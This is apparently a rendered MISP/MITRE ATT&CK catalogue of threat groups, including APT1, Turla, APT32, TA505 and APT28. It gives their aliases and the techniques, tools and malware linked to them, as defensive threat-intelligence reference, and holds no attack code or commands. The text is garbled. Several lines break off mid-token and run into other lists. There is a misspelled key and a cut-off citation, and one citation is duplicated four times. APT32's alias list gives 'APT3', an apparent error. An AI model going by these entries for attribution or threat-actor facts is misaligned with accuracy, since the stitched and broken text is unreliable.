• uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Virtual Private Server - T1583.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party infrastructure services - T1329" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Dynamic DNS - T1311" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/groups/G0088">https://attack.mitre.org/groups/G0088</a></td>
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<td><a href="https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html">https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html</a></td>
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</table>

FIN10 - G0051

[FIN10](https://attack.mitre.org/groups/G0051) is a financially motivated threat group that has targeted organizations in North America since at least 2013 through 2016. The group uses stolen data exfiltrated from victims to extort organizations. (Citation: FireEye FIN10 June 2017)
The tag is: `misp-galaxy:mitre-intrusion-set="FIN10 - G0051"`

FIN10 - G0051 is also known as:

- FIN10

FIN10 - G0051 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-tool="Empire - S0363"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003"` with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/groups/G0051">https://attack.mitre.org/groups/G0051</a></td>
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**APT12 - G0005**

[APT12](https://attack.mitre.org/groups/G0005) is a threat group that has been attributed to China. The group has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments. (Citation: Meyers Numbered Panda)

The tag is: `misp-galaxy:mitre-intrusion-set="APT12 - G0005"`
APT12 - G0005 is also known as:

- APT12
- IXESHE
- DynCalc
- Numbered Panda
- DNSCALLC

APT12 - G0005 has relationships with:

- similar: misp-galaxy:threat-actor="IXESHE" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-malware="Ixeshe - S0015" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="RIPTIDE - S0003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="HTRAN - S0040" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="DNS Calculation - T1568.003" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/groups/G0005">https://attack.mitre.org/groups/G0005</a></td>
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<tr>
<td><a href="http://www.crowdstrike.com/blog/whois-numbered-panda/">http://www.crowdstrike.com/blog/whois-numbered-panda/</a></td>
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</table>

**APT30 - G0013**

[APT30](https://attack.mitre.org/groups/G0013) is a threat group suspected to be associated with the Chinese government. While [Naikon](https://attack.mitre.org/groups/G0019) shares some characteristics with [APT30](https://attack.mitre.org/groups/G0013), the two groups do not appear to be exact matches.(Citation: FireEye APT30)(Citation: Baumgartner Golovkin Naikon 2015)
The tag is: `misp-galaxy:mitre-intrusion-set="APT30 - G0013"`

APT30 - G0013 is also known as:

- APT30

APT30 - G0013 has relationships with:

- similar: `misp-galaxy:threat-actor="Naikon"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:threat-actor="Lotus Panda"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:threat-actor="APT 30"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-malware="SHIPSHAPE - S0028"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-malware="BACKSPACE - S0031"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-malware="NETEAGLE - S0034"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-malware="FLASHFLOOD - S0036"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-malware="SPACESHIP - S0035"` with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/groups/G0013">https://attack.mitre.org/groups/G0013</a></td>
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**APT1 - G0006**

[APT1](https://attack.mitre.org/groups/G0006) is a Chinese threat group that has been attributed to the 2nd Bureau of the People's Liberation Army (PLA) General Staff Department's (GSD) 3rd Department, commonly known by its Military Unit Cover Designator (MUCD) as Unit 61398. (Citation: Mandiant APT1)

The tag is: `misp-galaxy:mitre-intrusion-set="APT1 - G0006"`
APT1 - G0006 is also known as:

- APT1
- Comment Crew
- Comment Group
- Comment Panda

APT1 - G0006 has relationships with:

- similar: misp-galaxy:threat-actor="Comment Crew" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="CALENDAR - S0025" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="pwdump - S0006" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="GLOOXMAIL - S0026" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="Tasklist - S0057" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="ipconfig - S0100" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="Lsslsass - S0121" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="BISCUIT - S0017" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-tool="gsecdump - S0008" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-tool="Cachedump - S0119" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-malware="WEBC2 - S0109" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-tool="xCmd - S0123" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-malware="Seasalt - S0345" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Domains - T1584.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Email Accounts - T1585.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malware - T1588.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Domain registration hijacking - T1326" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obtain/re-use payloads - T1346" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party software services - T1330" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Dynamic DNS - T1333" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Compromise 3rd party infrastructure to support delivery - T1312" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/groups/G0006">https://attack.mitre.org/groups/G0006</a></td>
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<td><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf</a></td>
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**Axiom - G0001**

[Axiom](https://attack.mitre.org/groups/G0001) is a cyber espionage group suspected to be associated with the Chinese government. It is responsible for the Operation SMN campaign. (Citation: Novetta-Axiom) Though both this group and [Winnti Group](https://attack.mitre.org/groups/G0044) use the malware [Winnti for Windows](https://attack.mitre.org/software/S0141), the two groups appear to be distinct based on differences in reporting on the groups' TTPs and targeting. (Citation: Kaspersky Winnti April 2013) (Citation: Kaspersky Winnti June 2015) (Citation: Novetta Winnti April 2015)

The tag is: **misp-galaxy:mitre-intrusion-set="Axiom - G0001"**

Axiom - G0001 is also known as:

- Axiom
- Group 72

Axiom - G0001 has relationships with:
• similar: misp-galaxy:threat-actor="Aurora Panda" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:threat-actor="Axiom" with estimative-language:likelihood-probability="likely"

• uses: misp-galaxy:mitre-attack-pattern="Data Obfuscation - T1001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="Hydraq - S0203" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="Hikit - S0009" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="Derusbi - S0021" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="ZxShell - S0412" with estimative-language:likelihood-probability="almost-certain"


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<td><a href="https://attack.mitre.org/groups/G0001">https://attack.mitre.org/groups/G0001</a></td>
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</table>

Inception - G0100

Inception(https://attack.mitre.org/groups/G0100) is a cyber espionage group active since at least 2014. The group has targeted multiple industries and governmental entities primarily in Russia, but has also been active in the United States and throughout Europe, Asia, Africa, and the Middle East. (Citation: Unit 42 Inception November 2018)(Citation: Symantec Inception Framework March
The tag is: misp-galaxy:mitre-intrusion-set="Inception - G0100"

Inception - G0100 is also known as:

- Inception
- Inception Framework
- Cloud Atlas

Inception - G0100 has relationships with:

- uses: misp-galaxy:mitre-tool="LaZagne - S0349" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Template Injection - T1221" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="PowerShower - S0441" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="VBShower - S0442" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"

Table 4303. Table References

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<td><a href="https://attack.mitre.org/groups/G0010">https://attack.mitre.org/groups/G0010</a></td>
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**Turla - G0010**

[Turla](https://attack.mitre.org/groups/G0010) is a Russian-based threat group that has infected victims in over 45 countries, spanning a range of industries including government, embassies, military, education, research and pharmaceutical companies since 2004. Heightened activity was seen in mid-2015. [Turla](https://attack.mitre.org/groups/G0010) is known for conducting watering hole and spearphishing campaigns and leveraging in-house tools and malware. [Turla](https://attack.mitre.org/groups/G0010)'s espionage platform is mainly used against Windows machines, but has also been seen used against macOS and Linux machines.(Citation: Kaspersky Turla)(Citation: ESET Gazer Aug 2017)(Citation: CrowdStrike VENOMOUS BEAR)(Citation: ESET Turla Mosquito Jan 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Turla - G0010"

Turla - G0010 is also known as:
- Turla
- Group 88
- Belugasturgeon
- Waterbug
- WhiteBear
- VENOMOUS BEAR
- Snake
- Krypton

Turla - G0010 has relationships with:

- similar: misp-galaxy:threat-actor="Turla Group" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="APT 26" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-malware="Gazer - S0168" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="Tasklist - S0057" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="Mosquito - S0256" with estimative-language:likelihood-probability="almost-certain"
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• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="Reg - S0075" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="Epic - S0091" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="Uroburos - S0022" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="nbtstat - S0102" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="netstat - S0104" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="Arp - S0099" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
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• uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-
- uses: misp-galaxy:mitre-malware="ComRAT - S0126" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="Systeminfo - S0096" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="Empire - S0363" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-
• uses: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="certutil - S0160" with estimative-language:likelihood-probability="almost-certain"

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• uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

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• uses: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Information Repositories - T1213" with estimative-language:likelihood-probability="almost-certain"

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• uses: misp-galaxy:mitre-attack-pattern="Web Services - T1584.006" with estimative-language:likelihood-probability="almost-certain"

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• uses: misp-galaxy:mitre-malware="HyperStack - S0537" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Services - T1583.006" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="Crutch - S0538" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003" with estimative-language:likelihood-probability="almost-certain"

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• uses: misp-galaxy:mitre-tool="NBTscan - S0590" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Internet Connection Discovery - T1016.001" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

Table 4304. Table References

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APT32 - G0050

[APT32](https://attack.mitre.org/groups/G0050) is a threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as with foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims. The group is believed to be Vietnam-based.(Citation: FireEye APT32 May 2017)(Citation: Volexity OceanLotus Nov 2017)(Citation: ESET OceanLotus)

The tag is: `misp-galaxy:mitre-intrusion-set="APT32 - G0050"`

APT32 - G0050 is also known as:

- APT3
- SeaLotus
- OceanLotus
- APT-C-00

APT32 - G0050 has relationships with:

- similar: `misp-galaxy:threat-actor="APT32"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-malware="KOMPROGO - S0156"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068"` with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="WINDSHIELD - S0155" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="Denis - S0354" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"
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- uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
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- uses: misp-galaxy:mitre-malware="PHOREAL - S0158" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
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• uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="ipconfig - S0100" with estimative-language:likelihood-probability="almost-certain"

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• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

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• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

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• uses: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003" with estimative-language:likelihood-probability="almost-certain"

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• uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

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• uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="Goopy - S0477" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="Cobalt Strike - S0154" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Social Media Accounts - T1585.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Services - T1583.006" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1598.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Email Addresses - T1589.002" with estimative-language:likelihood-probability="almost-certain"
TA505 - G0092

[TA505](https://attack.mitre.org/groups/G0092) is a financially motivated threat group that has been active since at least 2014. The group is known for frequently changing malware and driving global trends in criminal malware distribution.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)

The tag is: `misp-galaxy:mitre-intrusion-set="TA505 - G0092"`

TA505 - G0092 is also known as:

- TA505
- Hive0065

TA505 - G0092 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005"` with estimative-
- uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="TrickBot - S0266" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="FlawedAmmyy - S0381" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="ServHelper - S0382" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="FlawedGrace - S0383" with estimative-language:liholehood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="Dridex - S0384" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Fast Flux DNS - T1568.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Email Account - T1087.003" with estimative-
APT28 - G0007

[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia’s General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165. This group has been active since at least 2004. [Citation: NSA/FBI Drovorub August 2020] [Citation: DOJ GRU Indictment Jul 2018] [Citation: Ars Technica GRU indictment Jul 2018] [Citation: Ars Technica GRU indictment Jul 2018] [Citation: Ars Technica GRU indictment Jul 2018] [Citation: Ars Technica GRU indictment Jul 2018] [Citation: GRIZZLY STEPPE JAR] [Citation: Sofacy DealersChoice] [Citation: Palo Alto Sofacy 06-2018] [Citation: Symantec APT28 Oct 2018] [Citation: ESET Zebrocy May 2019]

[APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. [Citation: Crowdstrike DNC June 2016] In 2018, the US indicted five GRU Unit 26165 officers associated with...
